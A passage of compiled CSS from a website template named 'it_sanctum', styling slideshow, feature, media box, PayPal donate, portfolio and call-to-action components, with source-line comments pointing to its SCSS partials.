  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
/* line 118, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button.empty {
  background: none;
  border: 2px solid #4f953b;
  color: #4f953b;
}
/* line 122, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button.empty:hover {
  background: #4f953b;
  border-color: #4f953b;
  color: #fff;
}
/* line 130, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-flex-center {
  text-align: center;
}
/* line 133, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 {
  padding: 70px 0;
}
/* line 135, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-title {
  padding: 15px 25px;
  background: #fff;
  color: #1a1a1a !important;
  font-size: 2rem;
  display: table;
  margin-bottom: 20px;
}
/* line 143, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-desc {
  padding: 15px 20px;
  background: #1a1a1a;
  color: #fff !important;
  font-size: 1.2rem;
  display: table;
}
/* line 150, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 151, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button {
  font-size: 1.2rem;
}
/* line 153, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.standard {
  background: #fff;
  border-color: #fff;
  color: #1a1a1a;
}
/* line 157, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.standard:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #fff;
}
/* line 163, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.empty {
  border-color: #fff;
  color: #fff;
}
/* line 166, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.empty:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #fff;
}
/* line 174, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 175, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2.uk-flex-right .g-slideshow-title, .g-slideshow .style2.uk-flex-right .g-slideshow-desc {
  margin-left: auto;
}
/* line 179, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 180, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2.uk-flex-center .g-slideshow-title {
  margin: 0 auto 20px;
}
/* line 183, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2.uk-flex-center .g-slideshow-desc {
  margin: auto;
}
/* line 188, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 189, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style3 .g-slideshow-title {
  font-size: 2rem;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.2rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.4rem;
  }
}
/* line 198, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style3 .g-slideshow-desc {
  font-size: 17px;
  line-height: 30px;
}
/* line 203, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 204, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 205, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .dark-text .style3 .g-slideshow-title {
  color: #959595 !important;
}
/* line 208, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .dark-text .style3 .g-slideshow-desc {
  color: #959595;
}
/* line 213, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-dotnav {
  margin: 0 0 35px;
}
/* line 216, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 217, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-item iframe {
  pointer-events: auto !important;
}
/* line 221, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 222, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .slideshow-caption.uk-overlay-background {
  padding: 25px;
}
/* line 226, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-left-short {
  -webkit-transform: translateX(-10%);
  -moz-transform: translateX(-10%);
  -ms-transform: translateX(-10%);
  -o-transform: translateX(-10%);
  transform: translateX(-10%);
}
/* line 229, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-right-short {
  -webkit-transform: translateX(10%);
  -moz-transform: translateX(10%);
  -ms-transform: translateX(10%);
  -o-transform: translateX(10%);
  transform: translateX(10%);
}
/* line 232, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-top-short {
  -webkit-transform: translateY(-10%);
  -moz-transform: translateY(-10%);
  -ms-transform: translateY(-10%);
  -o-transform: translateY(-10%);
  transform: translateY(-10%);
}
/* line 235, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-bottom-short {
  -webkit-transform: translateY(10%);
  -moz-transform: translateY(10%);
  -ms-transform: translateY(10%);
  -o-transform: translateY(10%);
  transform: translateY(10%);
}
/* line 238, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-scale {
  -webkit-transform: scale(0.8);
  -moz-transform: scale(0.8);
  -ms-transform: scale(0.8);
  -o-transform: scale(0.8);
  transform: scale(0.8);
}
/* line 241, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-left-short, .g-slideshow .uk-overlay-right-short, .g-slideshow .uk-overlay-top-short, .g-slideshow .uk-overlay-bottom-short {
  -webkit-transition-duration: 0.5s;
  -moz-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
/* line 244, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 245, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 246, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-active .uk-active .uk-overlay-scale {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
/* line 251, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow audio, .g-slideshow canvas, .g-slideshow video {
  display: block;
}
/* line 256, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 257, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 258, templates/it_sanctum/scss/sanctum/_slideshow.scss */
#g-fullwidth .g-slideshow .g-content, .g-flushed .g-slideshow .g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
/* line 1, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 4, templates/it_sanctum/scss/sanctum/_main-feature.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-left .g-content {
  margin: 0 0.625rem 0 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 11, templates/it_sanctum/scss/sanctum/_main-feature.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-right .g-content {
  margin: 0 0 0 0.625rem;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-right.align-right {
  text-align: right;
}
/* line 21, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-title {
  margin-top: -5px;
}
/* line 24, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .image-bottom {
  margin-bottom: -4.563rem;
}
/* line 27, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-link {
  margin-top: 5px;
}
/* line 29, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-link i {
  margin-right: 10px;
}
/* line 32, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-link.g-button2 {
  margin-left: 25px;
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link.g-button2 {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link {
    display: block;
  }
}
/* line 42, templates/it_sanctum/scss/sanctum/_main-feature.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-desc i {
  margin-right: 8px;
}
/* line 47, templates/it_sanctum/scss/sanctum/_main-feature.scss */
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
/* line 4, templates/it_sanctum/scss/sanctum/_media-box.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid {
  margin-bottom: 1.25rem;
}
/* line 7, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid:last-child {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid .g-block {
  margin-right: 1.25rem;
}
@media only all and (max-width: 47.938rem) {
  .g-media-box .g-grid .g-block {
    margin-right: 0;
    margin-bottom: 1.25rem;
  }
}
/* line 16, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid .g-block:last-child {
  margin-right: 0;
}
@media only all and (max-width: 47.938rem) {
  .g-media-box .g-grid .g-block:last-child {
    margin-bottom: 0;
  }
}
/* line 25, templates/it_sanctum/scss/sanctum/_media-box.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content {
  background: #fff;
  padding: 2rem;
  border: 1px solid #ddd;
}
/* line 31, templates/it_sanctum/scss/sanctum/_media-box.scss */
/* line 32, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
  color: #959595;
  background: transparent;
  border: 1px solid #ddd;
  width: 3rem;
  height: 3rem;
  line-height: 3rem;
  text-align: center;
  cursor: pointer;
  display: inline-block;
  -webkit-transition: 0.2s;
  -moz-transition: 0.2s;
  transition: 0.2s;
}
/* line 43, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
@media only all and (max-width: 47.938rem) {
  .g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
    width: 2.5rem;
    height: 2.5rem;
    line-height: 1.5rem;
    padding: 0.5rem;
  }
}
/* line 55, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-media-box-play {
  position: absolute;
  margin-top: -2.5rem;
}
/* line 59, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-item-text {
  visibility: hidden;
  position: absolute;
  width: 0;
  height: 0;
}
/* line 67, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-desc {
  margin: 1.5rem 0;
  padding-bottom: 1.5rem;
  border-bottom: 1px solid #ddd;
}
/* line 72, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-special1, .g-media-box .g-media-box-item .g-media-box-content .g-media-box-special2 {
  margin: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
  text-align: center;
}
/* line 5, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
/* line 6, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form form {
  margin: 0;
}
/* line 9, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
/* line 10, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 1.5rem;
  background: rgba(0, 0, 0, 0.2);
}
/* line 14, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  background: transparent;
  padding: 1.25rem;
  margin-top: -3px;
}
/* line 20, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button.button {
  padding: 0;
  border: 0;
}
/* line 4, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter {
  margin-bottom: 30px;
}
/* line 10, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter.uk-subnav > * > * {
  color: #959595;
}
/* line 13, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 3px 8px;
  border: 1px solid #ddd;
  background: #fff;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 18, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:focus, .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:hover {
  background: #fff;
  box-shadow: none;
  border: 1px solid #4f953b;
  color: #4f953b;
}
/* line 25, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter .uk-active > a {
  background: #fff;
  border: 1px solid #4f953b;
  color: #4f953b;
  box-shadow: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-item {
  border: 1px solid #ddd;
}
/* line 37, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.gutter-disabled .g-portfolio-item {
  border: none;
}
/* line 42, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-image > a {
  display: block;
}
/* line 47, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 51, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio p {
  margin: 0;
}
/* line 54, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-title {
  margin: 0;
}
/* line 56, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-title a {
  color: #282828;
}
/* line 58, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-title a:hover {
  color: #4f953b;
}
/* line 63, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-item-details {
  margin-top: 10px;
  font-size: 90%;
  color: #c8c8c8;
  font-style: italic;
}
/* line 68, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-item-details i {
  margin-right: 5px;
}
/* line 72, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-desc {
  margin-top: 10px;
}
/* line 75, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
/* line 78, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
/* line 81, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel a {
  color: #fff;
}
/* line 83, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
/* line 88, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2 .g-portfolio-special, .g-portfolio .g-info-container-style2 .g-item-details {
  color: #eee;
}
/* line 92, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
/* line 102, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-special i {
  margin-right: 5px;
}
/* line 106, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-link {
  float: right;
  font-style: italic;
}
/* line 109, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
/* line 121, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .no-special .g-portfolio-link {
  float: none;
}
/* line 126, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 127, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .no-link .g-portfolio-special {
  float: none;
}
/* line 131, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-bottom-info {
  margin-top: 15px;
}
/* line 134, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 135, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style3 .g-info-container {
  position: absolute;
  visibility: hidden;
  z-index: 9;
  opacity: 0;
  border: 1px solid #ddd;
  border-top: none;
  width: 100%;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
/* line 145, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style3 .g-portfolio-item {
  border: none;
  position: relative;
}
/* line 148, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 149, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style3 .g-portfolio-item:hover .g-info-container {
  visibility: visible;
  opacity: 1;
}
/* line 156, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 157, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-info-container-style2 {
  background: -webkit-linear-gradient( top , rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
/* line 160, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-info-container-style2 a {
  color: #fff;
}
/* line 162, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-info-container-style2 a:hover {
  color: #fff;
  text-decoration: underline;
}
/* line 168, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 169, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 170, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-portfolio-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
/* line 174, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 175, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 176, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-portfolio-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 185, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 186, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.portfolio-special .g-portfolio-filter {
  text-align: center;
  position: relative;
  top: -50px;
  margin-bottom: 0;
  justify-content: center;
}
/* line 195, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 196, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 197, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.gutter-enabled, .g-flushed .g-portfolio.gutter-enabled {
  padding: 30px;
}
/* line 200, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 201, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.filters-enabled.gutter-enabled, .g-flushed .g-portfolio.filters-enabled.gutter-enabled {
  padding-top: 0;
}
/* line 205, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter, .g-flushed .g-portfolio .g-portfolio-filter {
  border-bottom: 1px solid #f0f0f0;
}
/* line 207, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 0;
  border: none;
  height: 50px;
  width: 100%;
  line-height: 50px;
  font-weight: bold;
  font-size: 1rem;
  border-radius: 0;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    font-size: 0.9rem;
    font-weight: normal;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
@media only all and (max-width: 47.938rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
/* line 235, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav {
  margin-left: -30px;
  margin-right: -30px;
}
/* line 238, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav > * {
  padding-left: 0;
  border-right: 1px solid #f0f0f0;
  -webkit-box-flex: 1;
  -moz-box-flex: 1;
  box-flex: 1;
  -webkit-flex: 1;
  -moz-flex: 1;
  -ms-flex: 1;
  flex: 1;
  text-align: center;
}
/* line 246, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 247, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter {
  margin-bottom: 0;
}
/* line 249, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav {
  padding: 0 30px;
}
/* line 257, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 258, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.uk-tooltip.g-portfolio-tooltip {
  padding: 6px 12px;
  font-size: 13px;
}
/* line 1, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner {
  padding: 30px;
  border: 1px solid #ddd;
  border-left: 2px solid #4f953b;
  background: #fff;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-cta-button.style1 .g-cta-inner {
    padding: 20px;
  }
}
/* line 11, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
/* line 21, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 22, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
/* line 33, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
/* line 46, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
/* line 49, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
/* line 63, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
/* line 68, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
/* line 73, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 74, templates/it_sanctum/scss/sanctum/_cta-button.scss */
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
/* line 81, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
/* line 93, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
/* line 105, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
/* line 118, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
/* line 121, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
  background-color: transparent;
  color: #4f953b;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
